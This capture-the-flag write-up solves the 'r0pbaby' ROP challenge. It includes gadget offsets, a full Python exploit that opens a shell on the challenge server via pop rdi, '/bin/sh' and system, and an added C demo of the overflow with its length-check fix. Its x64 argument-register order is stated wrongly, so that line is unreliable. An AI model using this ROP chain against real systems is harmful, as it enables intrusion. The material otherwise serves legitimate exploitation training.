한국어(Korean): Link


We are given a binary below:

r0pbaby_542ee6516410709a1421141501f03760

As the name suggests, this challenge is about ROP. Let's check the protections.

As expected, NX is on and so is PIE.

Running the binary makes it clear what to do.

Menu option 2 gives us the address of any function we ask for, and option 3 triggers the overflow.

Let's take a look at how the overflow happens using gdb. To debug a PIE binary, first run it with "set stop-on-solib-events 1" so that gdb stops once the shared libraries are loaded, then set a breakpoint after the code section has been mapped (its address is only known at that point). Also set a breakpoint right after the call to memcpy, where the overflow occurs.

Our input is copied directly onto the stack at rbp, so we can think of a payload like this:

dummy [A*8]

Address of "pop %rdi; retq"

Pointer to "/bin/sh"

system function
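As an added example (not code from this writeup or from the challenge binary), the following C program models the frame the text describes: a fixed-size buffer followed by the saved rbp and the return address, all laid out in one array. The buffer size, the slot offsets and the sentinel value are assumptions made for the demonstration. It shows the unchecked memcpy pattern overwriting the return-address slot as soon as the caller-supplied length exceeds the buffer, and the same copy with a length check rejecting such input, which is the fix a developer would apply to this kind of code.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the vulnerable frame (an assumption for the demo):
 * a 32-byte buffer, then the saved rbp (8 bytes), then the return address
 * (8 bytes). A real compiler decides the layout; this array only imitates it. */
#define BUF_SIZE   32
#define RET_OFFSET (BUF_SIZE + 8)
#define FRAME_SIZE (BUF_SIZE + 16)

#define RET_SENTINEL 0x4141414141414141ULL /* constructed marker for the return slot */

typedef struct {
    unsigned char bytes[FRAME_SIZE];
} frame_t;

/* Reset the frame and plant the sentinel in the return-address slot. */
static void frame_init(frame_t *f) {
    uint64_t ret = RET_SENTINEL;
    memset(f->bytes, 0, sizeof f->bytes);
    memcpy(f->bytes + RET_OFFSET, &ret, sizeof ret);
}

static uint64_t frame_return_address(const frame_t *f) {
    uint64_t ret;
    memcpy(&ret, f->bytes + RET_OFFSET, sizeof ret);
    return ret;
}

/* Unchecked copy: the caller-supplied length is trusted, like the memcpy in
 * the writeup. Clamping to FRAME_SIZE only keeps the demo inside its own
 * array; the bug is that len is never compared with BUF_SIZE. */
static int copy_unchecked(frame_t *f, const unsigned char *in, size_t len) {
    if (len > FRAME_SIZE)
        len = FRAME_SIZE;
    memcpy(f->bytes, in, len);
    return 0;
}

/* Hardened copy: refuse any length that does not fit the buffer. */
static int copy_checked(frame_t *f, const unsigned char *in, size_t len) {
    if (len > BUF_SIZE)
        return -1;
    memcpy(f->bytes, in, len);
    return 0;
}

typedef int (*copy_fn)(frame_t *, const unsigned char *, size_t);

/* Run one copy of `len` filler bytes through `copy` on a fresh frame.
 * Returns 1 if the return-address slot no longer holds the sentinel. */
static int clobbers_return(copy_fn copy, size_t len) {
    frame_t f;
    unsigned char input[FRAME_SIZE];
    frame_init(&f);
    memset(input, 'B', sizeof input); /* constructed filler input */
    copy(&f, input, len);
    return frame_return_address(&f) != RET_SENTINEL;
}

/* Result of the hardened copy for a given length: 0 = accepted, -1 = rejected. */
static int checked_result(size_t len) {
    frame_t f;
    unsigned char input[FRAME_SIZE];
    frame_init(&f);
    memset(input, 'B', sizeof input);
    return copy_checked(&f, input, len);
}

int main(void) {
    size_t lengths[] = { 16, BUF_SIZE, BUF_SIZE + 9, FRAME_SIZE };
    for (size_t i = 0; i < sizeof lengths / sizeof lengths[0]; i++) {
        size_t n = lengths[i];
        printf("len=%2zu  unchecked: return slot %s  |  checked: %s\n", n,
               clobbers_return(copy_unchecked, n) ? "CLOBBERED" : "intact",
               checked_result(n) == 0 ? "accepted" : "rejected");
    }
    return 0;
}
```

The saved-rbp slot sits between the buffer and the return address, so a copy of exactly buffer size plus eight bytes still leaves the return slot intact; one byte more and the sentinel is gone. The checked variant rejects anything over BUF_SIZE before touching memory, which is the whole fix: the length must be validated against the destination, not against whatever the caller claims.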


The reason we put the address of "/bin/sh" in rdi is that on x64 arguments are passed in registers rather than on the stack, in this order:

rdi, rsi, rdx, r10, r9, r8

The first argument goes in rdi.


We need to find "pop rdi; retq" in libc using ROPgadget.

Then we measure the distance from system to "pop %rdi; retq" and to "/bin/sh".

system-0x22b1a = 0x23b26 = 146214

Sadly, the find command cannot locate "/bin/sh" in the libc file :( so we have to run the binary and read the address out of the running process.

0x7ffff798dcdb-0x7ffff7857640=1271451 (address of "/bin/sh" minus address of system)

The final exploit code (Python 2) is as follows.

from socket import *
import struct

p = lambda x:struct.pack("<Q", x) # pack a 64-bit little-endian value

s = socket(2,1) # AF_INET, SOCK_STREAM
s.connect(('r0pbaby_542ee6516410709a1421141501f03760.quals.shallweplayaga.me',10436))

print s.recv(1024) # banner
print s.recv(1024) # menu

# Option 2: ask for the address of system, which defeats PIE/ASLR for libc
s.send('2\n')
print s.recv(1024) # which func?
s.send('system\n')
tmp = s.recv(1024)
print tmp
system_addr = eval(tmp.split(': ')[1]) # parse the hex address after ': ' (int(x, 16) would avoid eval on server data)

# Chain: 8 dummy bytes, then pop rdi; retq -> "/bin/sh" -> system
payload = 'a'*8
payload += p(system_addr-146214) # pop rdi; retq;
payload += p(system_addr+1271451) # "/bin/sh"
payload += p(system_addr)
payload += '\n'

# Option 3: send the length, then the payload that overflows
s.send('3\n'+`len(payload)`+'\n'+payload)

print s.recv(1024)
s.send('4\n') # option 4; the chain runs once the overflowed frame returns
print s.recv(1024)

# Hand the connected socket to telnetlib for an interactive session
import telnetlib
tc = telnetlib.Telnet()
tc.sock = s
tc.interact()



Flag: W3lcome TO THE BIG L3agu3s kiddo, wasn't your first?
